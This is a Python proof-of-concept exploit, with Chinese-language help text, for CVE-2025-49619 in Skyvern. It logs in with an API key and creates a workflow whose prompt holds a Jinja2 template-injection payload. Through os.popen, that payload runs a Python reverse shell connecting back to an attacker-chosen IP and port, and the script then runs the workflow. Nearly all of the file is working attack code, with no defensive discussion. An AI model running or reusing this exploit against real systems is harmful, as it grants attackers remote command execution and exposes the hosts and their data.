1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103

import requests, argparse, pyfiglet

parser = argparse.ArgumentParser(description="此脚本利用Skyvern中的CVE-2025-49619执行反向shell命令。", formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument("-u", "--url", required=True, help="Skyvern URL（例如：http://example.com:8080）")
parser.add_argument("-k", "--x-api-key", required=True, help="转到Skyvern应用 -> 设置 -> API密钥 -> 显示并复制API密钥")
parser.add_argument("-i", "--ip", required=True, help="接收反向shell连接的IP地址")
parser.add_argument("-p", "--port", required=True, help="反向shell连接的端口")

def create_exploit_workflow(url, ip, port, x_api_key):
    exploit_workflow = {
    "title": "Exploit",
    "description": "",
    "proxy_location": "RESIDENTIAL",
    "webhook_callback_url": "",
    "persist_browser_session": False,
    "model": None,
    "totp_verification_url": None,
    "workflow_definition": {
        "parameters": [],
        "blocks": [
            {
                "label": "block_1",
                "continue_on_failure": False,
                "block_type": "task_v2",
                "prompt": (
                    "{% for x in ().__class__.__base__.__subclasses__() %}\n"
                    "  {% if 'warning' in x.__name__ %}\n"
                    "    {{ x()._module.__builtins__['__import__']('os').popen(\n"
                    "      \"python3 -c 'import socket,os,pty;\"\n"
                    "      \"s=socket.socket();\"\n"
                    f"     \'s.connect((\\\"{ip}\\\",{port}));\'\n"
                    "      \"os.dup2(s.fileno(),0);\"\n"
                    "      \"os.dup2(s.fileno(),1);\"\n"
                    "      \"os.dup2(s.fileno(),2);\"\n"
                    "      \"pty.spawn(\\\"sh\\\")'\"\n"
                    "    ).read() }}\n"
                    "  {% endif %}\n"
                    "{% endfor %}"
                ),
                "url": "",
                "max_steps": 25,
                "totp_identifier": None,
                "totp_verification_url": None
            }
        ]
    },
    "is_saved_task": False
    }

    headers = {
        "Content-Type": "application/json",
        "X-API-Key": x_api_key
    }
    response = requests.post(f"{url}/api/v1/workflows", json=exploit_workflow, headers=headers)

    if response.status_code == 200:
        print("[+] 漏洞利用工作流创建成功！")
    else:
        print("[-] 创建漏洞利用工作流失败：", response.text)
        return None
    
    workflow_permanent_id = response.json().get("workflow_permanent_id")

    print(f"[+] 工作流永久ID：{workflow_permanent_id}")

    return workflow_permanent_id

def run_exploit_workflow(url, x_api_key, workflow_permanent_id):

    workflow_data = {
        "workflow_id": workflow_permanent_id
    }

    headers = {
        "Content-Type": "application/json",
        "X-API-Key": x_api_key
    }
    response = requests.post(f"{url}/api/v1/workflows/{workflow_permanent_id}/run", json=workflow_data, headers=headers)

    if response.status_code == 200:
        print("[+] 漏洞利用工作流执行成功！")
    else:
        print("[-] 执行漏洞利用工作流失败：", response.text)


if __name__=="__main__":

    print("\n")
    print(pyfiglet.figlet_format("CVE-2025-49619 PoC", font="small", width=100))
    print("作者：Cristian Branet")
    print("GitHub：github.com/cristibtz")
    print("描述：此脚本利用Skyvern中的CVE-2025-49619执行反向shell命令。")
    print("\n")

    args = parser.parse_args()
    url = args.url
    x_api_key = args.x_api_key
    ip = args.ip
    port = args.port

    workflow_permanent_id = create_exploit_workflow(url, ip, port, x_api_key)

    run_exploit_workflow(url, x_api_key, workflow_permanent_id)